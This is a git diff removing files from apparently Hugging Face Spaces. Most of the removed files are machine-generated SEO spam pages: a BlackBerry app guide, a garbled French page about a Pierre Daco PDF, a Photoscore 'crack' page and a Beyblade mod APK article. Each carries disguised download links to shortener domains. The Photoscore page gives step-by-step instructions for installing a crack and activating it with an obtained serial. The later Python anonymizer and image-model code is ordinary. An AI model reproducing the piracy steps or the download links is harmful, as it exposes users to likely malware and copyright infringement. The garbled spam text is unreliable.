diff --git a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Blackberry App Download The Secret to Boosting Your Productivity and Entertainment.md b/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Blackberry App Download The Secret to Boosting Your Productivity and Entertainment.md deleted file mode 100644 index cca76f7a48bd02e0860b3d0b23303feb2ebc10c0..0000000000000000000000000000000000000000 --- a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Blackberry App Download The Secret to Boosting Your Productivity and Entertainment.md +++ /dev/null @@ -1,31 +0,0 @@ -
-

How to Download Blackberry Apps for Your Smartphone

-

Blackberry is one of the most popular smartphone brands in the world, with millions of loyal users who enjoy its features and security. However, if you want to make the most of your Blackberry device, you need to download some apps that can enhance your experience and productivity. In this article, we will show you how to download Blackberry apps for your smartphone in a few easy steps.

-

Step 1: Find the Blackberry App World

-

The Blackberry App World is the official app store for Blackberry devices, where you can find thousands of apps across various categories, such as games, social media, business, and entertainment. To access the Blackberry App World, you need a Blackberry ID and a data plan or Wi-Fi connection. You can either visit https://appworld.blackberry.com/webstore/ in your browser, or download the app from https://www.blackberry.com/us/en/services/app-world/download on your computer and transfer it to your device via USB cable.

-

blackberry app download


Download File ⚹⚹⚹ https://byltly.com/2uKyQB



-

Step 2: Browse or Search for Apps

-

Once you have the Blackberry App World on your device, you can start browsing or searching for apps that suit your needs and preferences. You can use the categories or the featured sections to discover new and popular apps, or you can use the search bar to type in keywords or app names. You can also filter your results by price, rating, or compatibility.

-

Step 3: Download and Install Apps

-

When you find an app that you like, tap on it to see more details, such as the description, screenshots, reviews, and permissions. If you decide to get it, tap the "Download" or "Buy" button, depending on whether the app is free or paid. You may need to enter your Blackberry ID and password, or your payment information for paid apps. After that, the app will start downloading and installing on your device; you can follow the progress in the notification bar or on the app page. Once the app is installed, you can launch it from your home screen or from the app list.

-

Conclusion

-

Downloading Blackberry apps for your smartphone is a simple and fun process that can open up a world of possibilities for your device. Whether you want to play games, chat with friends, work on documents, or watch videos, you can find an app for that on the Blackberry App World. Just follow the steps above and enjoy your new apps!

- -

How to Manage Your Blackberry Apps

-

After downloading and installing your Blackberry apps, you may want to manage them to keep your device organized and optimized. You can do this by using the Blackberry App World or the options menu on your device. Here are some tips on how to manage your Blackberry apps:

- -

How to Troubleshoot Your Blackberry Apps

-

Sometimes, your Blackberry apps may not work properly or cause some issues on your device. This can be due to various reasons, such as compatibility problems, bugs, corrupted files, low memory, etc. If you encounter any problems with your Blackberry apps, here are some steps you can take to troubleshoot them:

-

-
-
\ No newline at end of file diff --git a/spaces/1gistliPinn/ChatGPT4/Examples/Comprendre Les Femmes Pierre Daco.pdf VERIFIED.md b/spaces/1gistliPinn/ChatGPT4/Examples/Comprendre Les Femmes Pierre Daco.pdf VERIFIED.md deleted file mode 100644 index d44a50faed1d323f116ac2221d4db31a93c0d7e7..0000000000000000000000000000000000000000 --- a/spaces/1gistliPinn/ChatGPT4/Examples/Comprendre Les Femmes Pierre Daco.pdf VERIFIED.md +++ /dev/null @@ -1,9 +0,0 @@ -
-

Comprendre les femmes, Pierre Daco, presented the recording instrument, namely that insofar as it concerns. Pierre Daco. Understanding women and their psychology. geostatistics, geostatistics pdf, geostatistics course, geostatistics jobs, geostatistics modeling. comprendre les femmes pierre daco pdf download

-

Comprendre Les Femmes Pierre Daco.pdf


Download: https://imgfil.com/2uxY1f



-

The French group has, moreover, created an international virtual network dedicated to women, whose stated objective is to help advance them. L'histoire de la presse, volume IV, pages 288-313. (top) get comprendre les femmes pierre daco.pdf (pdf). get comprendre les femmes pierre daco.pdf. comprendre les femmes pierre daco. Emil au-delat. Erwin K. Lerchner. Dalla Schlesinger-Borgen. Presented the recording instrument, namely that insofar as it concerns.

-

A woman. For himself. One must understand that it is difficult to associate attitudes that are. currently. 90, dolo. outside the field of. incest, homosexuality and. sexual disorders, they have. such a dangerous meaning. of homosexuality. pornography, pornography. it is. they give us. but here we are. painful. to understand the meaning of women's sexuality. to understand them. and their. and their upkeep. homosexuality helps us to. understand women. and it is. dangerous to see it. for that. we. to serve as an example. 3. Pierre Daco - Belgian psychotherapist, born in 1936 and died in Koksijde, Belgium, in. to be. a.

-

Femininity, the invention of the female. The many styles of expression of this creation are not a simple affair. Pierre Daco. 9). Understanding. 9. Understanding women. That women. One of the. e. We cannot.

-

-
-
\ No newline at end of file diff --git a/spaces/1gistliPinn/ChatGPT4/Examples/Descargar Photoscore Ultimate 7 Crack 67.md b/spaces/1gistliPinn/ChatGPT4/Examples/Descargar Photoscore Ultimate 7 Crack 67.md deleted file mode 100644 index 303c0d6f3cfb514993829bb783400a3019360f3d..0000000000000000000000000000000000000000 --- a/spaces/1gistliPinn/ChatGPT4/Examples/Descargar Photoscore Ultimate 7 Crack 67.md +++ /dev/null @@ -1,102 +0,0 @@ - -

Descargar Photoscore Ultimate 7 Crack 67: A Powerful Software for Music Scanning and Notation

- -

If you are looking for a software that can scan and edit music scores, whether they are printed or handwritten, you might want to check out Descargar Photoscore Ultimate 7 Crack 67. This software is a comprehensive solution for music scanning and notation. It has many features and benefits that make it a reliable and efficient tool for musicians, composers and teachers.

- -

What is Descargar Photoscore Ultimate 7 Crack 67?

- -

Descargar Photoscore Ultimate 7 Crack 67 is a software package that was designed by Neuratron, a company that specializes in music software and solutions. It is a desktop application that can run on Windows and Mac OS platforms. It can scan and edit music scores, whether they are printed or handwritten. It can also support the latest scanners and formats, such as PDF, JPEG, TIFF and more.

-

Descargar Photoscore Ultimate 7 Crack 67


Download File: https://imgfil.com/2uxXZ8



- -

Descargar Photoscore Ultimate 7 Crack 67 has many features and functions that allow users to perform various tasks with music scores, such as:

- - - -

What are the benefits of Descargar Photoscore Ultimate 7 Crack 67?

- -

Descargar Photoscore Ultimate 7 Crack 67 has many benefits that make it a valuable tool for music scanning and notation. Some of these benefits are:

- - - -

How to download and install Descargar Photoscore Ultimate 7 Crack 67?

- -

If you want to download and install Descargar Photoscore Ultimate 7 Crack 67 on your computer, you can follow these steps:

- -
    -
  1. Go to the official website of Neuratron and register for a free trial account.
  2. Download the installation file for Descargar Photoscore Ultimate 7 Crack 67 from the website or from the link provided in the email confirmation.
  3. Run the installation file and follow the instructions on the screen to install the software on your computer.
  4. Download the crack file for Descargar Photoscore Ultimate 7 Crack 67 from the link provided in the email confirmation or from another source.
  5. Copy the crack file and paste it into the installation folder of Descargar Photoscore Ultimate 7 Crack 67 on your computer.
  6. Run the crack file and activate the software using the serial number provided in the email confirmation or from another source.
- -

Congratulations! You have successfully downloaded and installed Descargar Photoscore Ultimate 7 Crack 67 on your computer. You can now start using the software to scan and edit your music scores.

- -

Conclusion

- -

Descargar Photoscore Ultimate 7 Crack 67 is a powerful software for music scanning and notation. It can scan and edit printed or handwritten music scores. It has many features and benefits that make it a reliable and efficient tool for musicians, composers and teachers. If you want to try out this software, you can download and install it on your computer using the steps provided above. We hope you found this article helpful and informative. Thank you for reading!

-

-
-
\ No newline at end of file diff --git a/spaces/1phancelerku/anime-remove-background/Experience the Thrill of Beyblade Burst with MOD APK Version 11.0.4.md b/spaces/1phancelerku/anime-remove-background/Experience the Thrill of Beyblade Burst with MOD APK Version 11.0.4.md deleted file mode 100644 index e2638205d63129e5029c04d6d669e24106faeeba..0000000000000000000000000000000000000000 --- a/spaces/1phancelerku/anime-remove-background/Experience the Thrill of Beyblade Burst with MOD APK Version 11.0.4.md +++ /dev/null @@ -1,162 +0,0 @@ -
-

Beyblade Burst Mod Apk: A Guide for Fans of Spinning Tops

-

If you are a fan of spinning tops, you might have heard of Beyblade, a popular toy and anime franchise that has been around since the late 1990s. Beyblade is a game where players launch their customized tops, called Beys, into a stadium and try to knock out their opponents' Beys. The game has evolved over the years, with new generations of Beys, characters, and anime series. One of the latest iterations is Beyblade Burst, which has its own app that lets you create, customize, and battle your Beys online.

-

beyblade burst mod apk


Download ○○○ https://jinyurl.com/2uNMem



-

However, if you want to enjoy the full features and benefits of the game, you might want to try Beyblade Burst Mod Apk, a modified version of the app that gives you unlimited money, access to all Beys, and more. In this article, we will explain what Beyblade Burst is, what Beyblade Burst Mod Apk is, how to download and install it, and some tips and tricks to master the game. We will also share some reviews and ratings of the game, as well as a comparison table of Beyblade Burst and other similar games. Finally, we will answer some frequently asked questions about Beyblade Burst.

-

What is Beyblade Burst?

-

The origin and popularity of Beyblade

-

Beyblade is a toy line created by Takara Tomy in Japan in 1999. It was inspired by traditional spinning tops called beigoma, which were popular in Japan in the early 20th century. The name Beyblade comes from combining the words "beigoma" and "blade". The original toy line consisted of plastic or metal tops that had interchangeable parts, such as an energy layer, a forge disc, a performance tip, and an optional driver. Each part had different attributes that affected the performance of the top in battle.

-

Beyblade also spawned an anime series that followed the adventures of a group of young Bladers who competed in tournaments using their Beys. The anime series was adapted into various languages and aired in many countries around the world. The franchise also expanded into manga, video games, movies, merchandise, and more. As of 2020, Beyblade has sold over 500 million toys worldwide.

-

The features and gameplay of Beyblade Burst

-

Beyblade Burst is the third generation of the Beyblade franchise, which started in 2015. It introduced new features such as burst finishes, where a top can explode into pieces during battle; avatar attacks, where a top can unleash a powerful attack based on its energy layer; slingshock, where a top can ride on rails in the stadium; hypersphere, where a top can jump high in the air; speedstorm, where a top can create powerful wind currents; and dynamite battle, where a top can change its height during battle.

-

The gameplay of Beyblade Burst is similar to previous generations. Players launch their Beys into a stadium using a launcher device and try to knock out or burst their opponents' Beys. The winner is determined by how many points they score based on the outcome of the battle. For example, a ring out finish is worth one point, a burst finish is worth two points, and a survivor finish is worth one point if the opponent's top stops spinning first.

-

Beyblade Burst also has an app that allows players to scan their physical Beys and use them in the virtual world. The app has various modes, such as story mode, where players can follow the plot of the anime series; battle mode, where players can challenge other players online or offline; customization mode, where players can create and modify their Beys; and collection mode, where players can view and manage their Beys. The app also has a ranking system, where players can earn points and badges based on their performance.

-

beyblade burst mod apk unlimited money
-beyblade burst mod apk download latest version
-beyblade burst mod apk android 1
-beyblade burst mod apk hack
-beyblade burst mod apk revdl
-beyblade burst mod apk offline
-beyblade burst mod apk 10.2
-beyblade burst mod apk no ads
-beyblade burst mod apk all parts unlocked
-beyblade burst mod apk free shopping
-beyblade burst mod apk unlimited everything
-beyblade burst mod apk rexdl
-beyblade burst mod apk happymod
-beyblade burst mod apk 2023
-beyblade burst mod apk all beys unlocked
-beyblade burst mod apk unlimited coins and gems
-beyblade burst mod apk latest update
-beyblade burst mod apk online multiplayer
-beyblade burst mod apk obb
-beyblade burst mod apk pure
-beyblade burst mod apk unlimited spins
-beyblade burst mod apk an1
-beyblade burst mod apk all characters unlocked
-beyblade burst mod apk unlimited energy
-beyblade burst mod apk vip unlocked
-beyblade burst mod apk new version
-beyblade burst mod apk unlimited tickets
-beyblade burst mod apk apkpure
-beyblade burst mod apk all stadiums unlocked
-beyblade burst mod apk unlimited diamonds
-beyblade burst mod apk god mode
-beyblade burst mod apk 10.1.1
-beyblade burst mod apk for pc
-beyblade burst mod apk all codes unlocked
-beyblade burst mod apk unlimited qr codes
-beyblade burst mod apk 10.0.3
-beyblade burst mod apk mega.nz
-beyblade burst mod apk all levels unlocked
-beyblade burst mod apk unlimited scan codes
-beyblade burst mod apk mediafıre link

-

What is Beyblade Burst Mod Apk?

-

The benefits and drawbacks of using a modded version of the game

-

Beyblade Burst Mod Apk is a modified version of the official Beyblade Burst app that gives players some advantages and disadvantages. The main benefits of using Beyblade Burst Mod Apk are unlimited money and access to all Beys, without having to earn or buy them.

- -

However, there are also some drawbacks of using Beyblade Burst Mod Apk, such as the risk of malware from untrusted download sites, the possibility of a ban, and the lack of official updates.

- -

The steps to download and install Beyblade Burst Mod Apk

-

If you want to try Beyblade Burst Mod Apk, you need to follow these steps:

-
    -
  1. Find a reliable source: You need to find a trustworthy website that offers Beyblade Burst Mod Apk for download. You can search online or ask for recommendations from other players.
  2. Download the file: You need to download the apk file from the website. Make sure you have enough storage space on your device and a stable internet connection.
  3. Enable unknown sources: You need to enable unknown sources on your device settings. This will allow you to install apps from sources other than the Google Play Store.
  4. Install the file: You need to locate the apk file on your device and tap on it to install it. Follow the instructions on the screen and wait for the installation to complete.
  5. Launch the game: You need to open the game and enjoy playing with unlimited money and access to all Beys.

What are some tips and tricks to master Beyblade Burst?

-

How to choose the best Bey for your battle style

-

One of the most important aspects of Beyblade Burst is choosing the right Bey for your battle style. There are four types of Beys: attack, defense, stamina, and balance. Each type has its own strengths and weaknesses, and can perform better or worse depending on the opponent and the stadium. Here are some general guidelines for choosing the best Bey for your battle style:

- -

How to use special tiles, skills, and avatar attacks

-

Beyblade Burst has some special features that can enhance your gameplay and give you an edge over your opponents. Some of these features are:

- -

How to participate in tournaments and leagues

-

Beyblade Burst also has some competitive modes that allow you to test your skills against other players from around the world. Some of these modes are:

-

What are some reviews and ratings of Beyblade Burst?

-

The positive and negative feedback from users and critics

-

Beyblade Burst has received mixed reviews and ratings from users and critics. Some of the positive feedback are:

- -

Some of the negative feedback are:

- -

A comparison table of Beyblade Burst and other similar games

-

Beyblade Burst is not the only game that involves spinning tops and battles. There are other similar games that you might want to check out. Here is a comparison table of Beyblade Burst and some of its competitors:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Game | Developer | Platform | Features | Ratings
Beyblade Burst | Hasbro Inc. | Android, iOS | Create, customize, and battle your Beys online or offline; scan your physical Beys and use them in the virtual world; follow the story of the anime series; participate in tournaments and leagues; use special tiles, skills, and avatar attacks. | 4.1 out of 5 stars on Google Play; 4.6 out of 5 stars on App Store; 7.5 out of 10 on IGN.
Battle of Spin Blade | BeyBlade Battle Games | Android | Choose from over 100 Beys and battle against other players online or offline; customize your Beys with different parts and colors; use power-ups and special moves to win battles; collect coins and gems to unlock new Beys and items. | 4.0 out of 5 stars on Google Play.
Takara Tomy Beyblade Burst Superking B-173 Random Booster Vol.22 (Japan Import) | Takara Tomy | Nintendo Switch | Play as your favorite characters from the anime series and use their Beys in battle; enjoy the realistic graphics and physics of the game; experience the new dynamite battle system that allows you to change your Bey's height during battle; compete with other players online or locally. | 4.7 out of 5 stars on Amazon Japan; 8 out of 10 on Nintendo Life.
BeyWarriors: BeyRaiderz | Nelvana Digital Inc. | iOS | Race your BeyRaiderz vehicles through different tracks and collect tokens; use your tokens to unleash powerful attacks on your opponents; customize your vehicles with different colors and decals; challenge your friends in multiplayer mode. | 3.9 out of 5 stars on App Store.
-

Conclusion and FAQs

-

A summary of the main points and a call to action

-

In conclusion, Beyblade Burst is a game that lets you create, customize, and battle your Beys online or offline. It is based on the popular toy and anime franchise that has been around since 1999. It has many features, such as burst finishes, avatar attacks, slingshock, hypersphere, speedstorm, and dynamite battle. However, if you want to enjoy the full benefits of the game, you might want to try Beyblade Burst Mod Apk, a modified version of the app that gives you unlimited money, access to all Beys, and more. However, you also need to be aware of the risks of using a modded version of the game, such as malware, ban, or lack of updates. You also need to follow some steps to download and install Beyblade Burst Mod Apk safely. Moreover, you can improve your skills by following some tips and tricks to choose the best Bey for your battle style, use special tiles, skills, and avatar attacks, and participate in tournaments and leagues. You can also compare Beyblade Burst with other similar games and read some reviews and ratings of the game. If you have any questions about Beyblade Burst, you can check out the FAQs section below.

-

If you are a fan of spinning tops and want to experience the thrill of Beyblade Burst, you should download the app today and start playing. You can also try Beyblade Burst Mod Apk if you want to have more fun and advantages. However, you should also be careful and responsible when using a modded version of the game. Remember, the most important thing is to enjoy the game and have fun with your Beys. Let it rip!

-

Five frequently asked questions and answers about Beyblade Burst

-

Here are some of the most common questions and answers about Beyblade Burst:

-
    -
  1. Q: Is Beyblade Burst safe for kids?
     A: Yes, Beyblade Burst is safe for kids. It is rated E for Everyone by the ESRB and 4+ by the App Store. It does not contain any violence, gore, profanity, or inappropriate content. However, parents should still supervise their kids when they play the game online or use a modded version of the game.
  2. Q: How can I scan my physical Beys into the app?
     A: You can scan your physical Beys into the app by using your device's camera. You need to find the QR code on your Bey's energy layer or on the packaging and point your camera at it. The app will recognize the code and add the Bey to your collection.
  3. Q: How can I get more coins and gems in the game?
     A: You can get more coins and gems in the game by winning battles, completing challenges, watching ads, or buying them with real money. You can also use Beyblade Burst Mod Apk to get unlimited coins and gems for free.
  4. Q: How can I contact the developers or report a problem with the game?
     A: You can contact the developers or report a problem with the game by using the feedback option in the app's settings menu. You can also visit their website or social media pages for more information and support.
  5. Q: How can I update the game or get the latest version of Beyblade Burst Mod Apk?
     A: You can update the game or get the latest version of Beyblade Burst Mod Apk by checking for updates in the Google Play Store or App Store. You can also visit the website where you downloaded Beyblade Burst Mod Apk and look for new updates.

-
-
\ No newline at end of file diff --git a/spaces/2hack2furious/anonymizer/modules.py b/spaces/2hack2furious/anonymizer/modules.py deleted file mode 100644 index eea97aba13209c9fe094c6ababb8ccd866708f92..0000000000000000000000000000000000000000 --- a/spaces/2hack2furious/anonymizer/modules.py +++ /dev/null @@ -1,160 +0,0 @@ -from itertools import combinations -import numpy as np -import pandas as pd - -SUPPORTED_TYPES = [".csv", ".json", ".xlsx"] - -def hello_world(): return "hello world!" - -def load_file(file): - """ - Takes a file given by Streamlit and loads into a DataFrame. - Returns a DataFrame, metadata, and result string. - - @param file: File uploaded into streamlit. - @rtype: tuple - @return: A tuple of format (pd.DataFrame, (str, str), str). - """ - df = None - - if file is None: return df, ("", ""), "" - - filename = file.name - extension = filename.split(".")[-1] - metadata = (filename, extension) - - import_functions = { - "csv": pd.read_csv, - "json": pd.read_json, - "xlsx": pd.read_excel - } - try: - reader = import_functions.get(extension, None) - if reader is None: - return df, metadata, f"Error: Invalid extension '{extension}'" - df = reader(file) - rows, columns = df.shape - return df, metadata, f"File '{filename}' loaded successfully.\nFound {rows} rows, {columns} columns." - except Exception as error: - return df, metadata, f"Error: Unable to read file '{filename}' ({type(error)}: {error})" - -def data_cleaner(df, drop_missing=False, remove_duplicates=True): - """ - Takes a DataFrame and removes empty and duplicate entries. - - @type df: pd.DataFrame - @param df: A DataFrame of uncleaned data. - @type drop_missing: bool - @param drop_missing: Determines if rows with any missing values are dropped ("any"), or just empty rows ("all"). - @type remove_duplicates: bool - @param remove_duplicates: Determines if duplicate rows are removed. 
- @rtype: pd.DataFrame - @return: A DataFrame with requested cleaning applied - """ - df = df.dropna(how="any" if drop_missing else "all") - if remove_duplicates: df = df.drop_duplicates() - return df - -def column_combinations(df, k): - return list(combinations(df.columns, k)) - -def k_redact(df, k): - kwise_combinations = column_combinations(df, k) - - for columns in kwise_combinations: - df_search = df.loc[:, columns] - sensitive_data = [ - (columns, key) - for key, value - in df_search.value_counts().to_dict().items() - if value == 1 - ] - if not sensitive_data: continue - for columns, values in sensitive_data: - for column, value in zip(columns, values): - df_search = df_search.loc[df[column] == value] - if df_search.shape[0] == 1: - for column in columns: - df_search[column] = None - - return df - -def sensitive_values(series, sensitivity_minimum): - return {key - for key, value - in series.value_counts().to_dict().items() - if value < sensitivity_minimum - } - -def drop_sensitive(series, sensitivity_minimum): - series.loc[series.isin(sensitive_values(series, sensitivity_minimum))] = None - -def bin_numeric(df, to_process, bin_size, sensitivity_minimum): - processed = set() - rows, _ = df.shape - num_bins = rows//bin_size - for column_name in to_process: - column = df[column_name] - if column.dtype.kind not in "biufc": continue - array = sorted(np.array(column)) - array_min, array_max = array[0], array[-1] - splits = [array_min] + list(np.array_split(array, num_bins)) + [array_max] - bins = [ - (np.min(split), np.max(split)) - for split - in (splits[i] for i in range(num_bins)) - ] - result = [None] * rows - for bin_min, bin_max in bins: - for i, value in enumerate(column): - if bin_min <= value <= bin_max: - result[i] = (bin_min, bin_max) - df[column_name] = result - drop_sensitive(df[column_name], sensitivity_minimum) - processed.add(column_name) - return df, to_process - processed - -def find_categorical(df, to_process, max_categorical_size, sensitivity_minimum): - processed = set() - for column_name in to_process: - column = df[column_name] - if column.nunique() <= max_categorical_size: - drop_sensitive(column, sensitivity_minimum) - processed.add(column_name) - return df, to_process - processed - -def redact(df, to_process, sensitivity_minimum): - processed = set() - for column_name in to_process: - column = df[column_name] - - is_object = column.dtype == object - if not is_object: continue - - # Check if any unique values exist, and redact them - drop_sensitive(column, sensitivity_minimum) - processed.add(column_name) - - return df, to_process - processed - -def anonymize(df, max_categorical_size, bin_size, sensitivity_minimum): - to_process = set(df.columns) - df, to_process = redact(df, to_process, sensitivity_minimum) - df, to_process = find_categorical(df, to_process, max_categorical_size, sensitivity_minimum) - df, to_process = bin_numeric(df, to_process, bin_size, sensitivity_minimum) - return df, to_process - -def data_anonymizer(df, k, max_categorical_size, bin_size, sensitivity_minimum): - start_dtypes = df.dtypes.to_dict() - df, unprocessed = anonymize(df, max_categorical_size, bin_size, sensitivity_minimum) - df = k_redact(df, k) - end_dtypes = df.dtypes.to_dict() - - # Type correction - for column in df.columns: - start_type, end_type = start_dtypes[column], end_dtypes[column] - if start_type == end_type: continue - if start_type.kind == "i" and end_type.kind == "f": - df[column] = df[column].astype("Int64") - - return df, unprocessed diff --git 
a/spaces/52Hz/SRMNet_thesis/model_arch/SRMNet_SWFF.py b/spaces/52Hz/SRMNet_thesis/model_arch/SRMNet_SWFF.py deleted file mode 100644 index 94e3f360369e0c9bc62c57cf5be1dafa73a20f4d..0000000000000000000000000000000000000000 --- a/spaces/52Hz/SRMNet_thesis/model_arch/SRMNet_SWFF.py +++ /dev/null @@ -1,265 +0,0 @@ -import torch -import torch.nn as nn -from WT import DWT, IWT -##---------- Basic Layers ---------- -def conv3x3(in_chn, out_chn, bias=True): - layer = nn.Conv2d(in_chn, out_chn, kernel_size=3, stride=1, padding=1, bias=bias) - return layer - -def conv(in_channels, out_channels, kernel_size, bias=False, stride=1): - return nn.Conv2d( - in_channels, out_channels, kernel_size, - padding=(kernel_size // 2), bias=bias, stride=stride) - -def bili_resize(factor): - return nn.Upsample(scale_factor=factor, mode='bilinear', align_corners=False) - -##---------- Basic Blocks ---------- -class UNetConvBlock(nn.Module): - def __init__(self, in_size, out_size, downsample): - super(UNetConvBlock, self).__init__() - self.downsample = downsample - self.block = SK_RDB(in_channels=in_size, growth_rate=out_size, num_layers=3) - if downsample: - self.downsample = PS_down(out_size, out_size, downscale=2) - - def forward(self, x): - out = self.block(x) - if self.downsample: - out_down = self.downsample(out) - return out_down, out - else: - return out - -class UNetUpBlock(nn.Module): - def __init__(self, in_size, out_size): - super(UNetUpBlock, self).__init__() - # self.up = nn.ConvTranspose2d(in_size, out_size, kernel_size=2, stride=2, bias=True) - self.up = PS_up(in_size, out_size, upscale=2) - self.conv_block = UNetConvBlock(in_size, out_size, False) - - def forward(self, x, bridge): - up = self.up(x) - out = torch.cat([up, bridge], dim=1) - out = self.conv_block(out) - return out - -##---------- Resizing Modules (Pixel(Un)Shuffle) ---------- -class PS_down(nn.Module): - def __init__(self, in_size, out_size, downscale): - super(PS_down, self).__init__() - self.UnPS = nn.PixelUnshuffle(downscale) - self.conv1 = nn.Conv2d((downscale**2) * in_size, out_size, 1, 1, 0) - - def forward(self, x): - x = self.UnPS(x) # h/2, w/2, 4*c - x = self.conv1(x) - return x - -class PS_up(nn.Module): - def __init__(self, in_size, out_size, upscale): - super(PS_up, self).__init__() - - self.PS = nn.PixelShuffle(upscale) - self.conv1 = nn.Conv2d(in_size//(upscale**2), out_size, 1, 1, 0) - - def forward(self, x): - x = self.PS(x) # h/2, w/2, 4*c - x = self.conv1(x) - return x - -##---------- Selective Kernel Feature Fusion (SKFF) ---------- -class SKFF(nn.Module): - def __init__(self, in_channels, height=3, reduction=8, bias=False): - super(SKFF, self).__init__() - - self.height = height - d = max(int(in_channels / reduction), 4) - - self.avg_pool = nn.AdaptiveAvgPool2d(1) - self.conv_du = nn.Sequential(nn.Conv2d(in_channels, d, 1, padding=0, bias=bias), nn.PReLU()) - - self.fcs = nn.ModuleList([]) - for i in range(self.height): - self.fcs.append(nn.Conv2d(d, in_channels, kernel_size=1, stride=1, bias=bias)) - - self.softmax = nn.Softmax(dim=1) - - def forward(self, inp_feats): - batch_size, n_feats, H, W = inp_feats[1].shape - - inp_feats = torch.cat(inp_feats, dim=1) - inp_feats = inp_feats.view(batch_size, self.height, n_feats, inp_feats.shape[2], inp_feats.shape[3]) - - feats_U = torch.sum(inp_feats, dim=1) - feats_S = self.avg_pool(feats_U) - feats_Z = self.conv_du(feats_S) - - attention_vectors = [fc(feats_Z) for fc in self.fcs] - attention_vectors = torch.cat(attention_vectors, dim=1) - attention_vectors = 
attention_vectors.view(batch_size, self.height, n_feats, 1, 1) - - attention_vectors = self.softmax(attention_vectors) - feats_V = torch.sum(inp_feats * attention_vectors, dim=1) - - return feats_V - -##---------- Selective Wavelet Feature Fusion (SKFF) ---------- -class SWFF(nn.Module): - def __init__(self, in_channels, height=3, reduction=8, bias=False): - super(SWFF, self).__init__() - - self.height = height - d = max(int(in_channels / reduction), 4) - - self.avg_pool = nn.AdaptiveAvgPool2d(1) - self.wav_conv_du = nn.Sequential(nn.Conv2d(4*in_channels, d, 1, padding=0, bias=bias), nn.PReLU()) - self.dwt = DWT() - self.iwt = IWT() - self.fcs = nn.ModuleList([]) - for i in range(self.height): - self.fcs.append(nn.Conv2d(d, in_channels*4, kernel_size=1, stride=1, bias=bias)) - - self.softmax = nn.Softmax(dim=1) - - def forward(self, inp_feats): - batch_size, n_feats, H, W = inp_feats[0].shape - wavelet_rep = [(self.dwt(each)) for each in inp_feats] - - wav_inp_feats = torch.cat(wavelet_rep, dim=1) - wav_inp_feats = wav_inp_feats.view(batch_size, self.height, n_feats*4, wav_inp_feats.shape[2], wav_inp_feats.shape[3]) - - inp_feats = torch.cat(inp_feats, dim=1) - inp_feats = inp_feats.view(batch_size, self.height, n_feats, inp_feats.shape[2], inp_feats.shape[3]) - - feats_U = torch.sum(wav_inp_feats, dim=1) - feats_S = self.avg_pool(feats_U) - feats_Z = self.wav_conv_du(feats_S) - - attention_vectors = [self.avg_pool(self.iwt(fc(feats_Z))) for fc in self.fcs] - attention_vectors = torch.cat(attention_vectors, dim=1) - attention_vectors = attention_vectors.view(batch_size, self.height, n_feats, 1, 1) - - attention_vectors = self.softmax(attention_vectors) - feats_V = torch.sum(inp_feats * attention_vectors, dim=1) - - return feats_V - -##---------- Dense Block ---------- -class DenseLayer(nn.Module): - def __init__(self, in_channels, out_channels, I): - super(DenseLayer, self).__init__() - self.conv = nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=3 // 2) - self.relu = nn.ReLU(inplace=True) - self.sk = SKFF(out_channels, height=2, reduction=8, bias=False) - - def forward(self, x): - x1 = self.relu(self.conv(x)) - # output = torch.cat([x, x1], 1) # -> RDB - output = self.sk((x, x1)) - return output - -##---------- Selective Kernel Residual Dense Block (SK-RDB) ---------- -class SK_RDB(nn.Module): - def __init__(self, in_channels, growth_rate, num_layers): - super(SK_RDB, self).__init__() - self.identity = nn.Conv2d(in_channels, growth_rate, 1, 1, 0) - self.layers = nn.Sequential( - *[DenseLayer(in_channels, in_channels, I=i) for i in range(num_layers)] - ) - self.lff = nn.Conv2d(in_channels, growth_rate, kernel_size=1) - - def forward(self, x): - res = self.identity(x) - x = self.layers(x) - x = self.lff(x) - return res + x - -##---------- testNet ---------- -class SRMNet_SWFF(nn.Module): - def __init__(self, in_chn=3, wf=96, depth=4): - super(SRMNet_SWFF, self).__init__() - self.depth = depth - self.down_path = nn.ModuleList() - self.bili_down = bili_resize(0.5) - self.conv_01 = nn.Conv2d(in_chn, wf, 3, 1, 1) - - # encoder of UNet-64 - prev_channels = 0 - for i in range(depth): # 0,1,2,3 - downsample = True if (i + 1) < depth else False - self.down_path.append(UNetConvBlock(prev_channels + wf, (2 ** i) * wf, downsample)) - prev_channels = (2 ** i) * wf - - # decoder of UNet-64 - self.up_path = nn.ModuleList() - self.skip_conv = nn.ModuleList() - self.conv_up = nn.ModuleList() - self.bottom_conv = nn.Conv2d(prev_channels, wf, 3, 1, 1) - self.bottom_up = bili_resize(2 ** (depth-1)) 
- - for i in reversed(range(depth - 1)): - self.up_path.append(UNetUpBlock(prev_channels, (2 ** i) * wf)) - self.skip_conv.append(nn.Conv2d((2 ** i) * wf, (2 ** i) * wf, 3, 1, 1)) - self.conv_up.append(nn.Sequential(*[bili_resize(2 ** i), nn.Conv2d((2 ** i) * wf, wf, 3, 1, 1)])) - # *[nn.Conv2d((2 ** i) * wf, wf, 3, 1, 1), bili_resize(2 ** i)]) - prev_channels = (2 ** i) * wf - - self.final_ff = SKFF(in_channels=wf, height=depth) - self.last = conv3x3(prev_channels, in_chn, bias=True) - - def forward(self, x): - img = x - scale_img = img - - ##### shallow conv ##### - x1 = self.conv_01(img) - encs = [] - ######## UNet-64 ######## - # Down-path (Encoder) - for i, down in enumerate(self.down_path): - if i == 0: # top layer - x1, x1_up = down(x1) - encs.append(x1_up) - elif (i + 1) < self.depth: # middle layer - scale_img = self.bili_down(scale_img) - left_bar = self.conv_01(scale_img) - x1 = torch.cat([x1, left_bar], dim=1) - x1, x1_up = down(x1) - encs.append(x1_up) - else: # lowest layer - scale_img = self.bili_down(scale_img) - left_bar = self.conv_01(scale_img) - x1 = torch.cat([x1, left_bar], dim=1) - x1 = down(x1) - - # Up-path (Decoder) - ms_result = [self.bottom_up(self.bottom_conv(x1))] - for i, up in enumerate(self.up_path): - x1 = up(x1, self.skip_conv[i](encs[-i - 1])) - ms_result.append(self.conv_up[i](x1)) - - # Multi-scale selective feature fusion - msff_result = self.final_ff(ms_result) - - ##### Reconstruct ##### - out_1 = self.last(msff_result) + img - - return out_1 - -if __name__ == "__main__": - from thop import profile - input = torch.ones(1, 3, 256, 256, dtype=torch.float, requires_grad=False) - - model = SRMNet_SWFF(in_chn=3, wf=96, depth=4) - out = model(input) - flops, params = profile(model, inputs=(input,)) - - # RDBlayer = SK_RDB(in_channels=64, growth_rate=64, num_layers=3) - # print(RDBlayer) - # out = RDBlayer(input) - # flops, params = 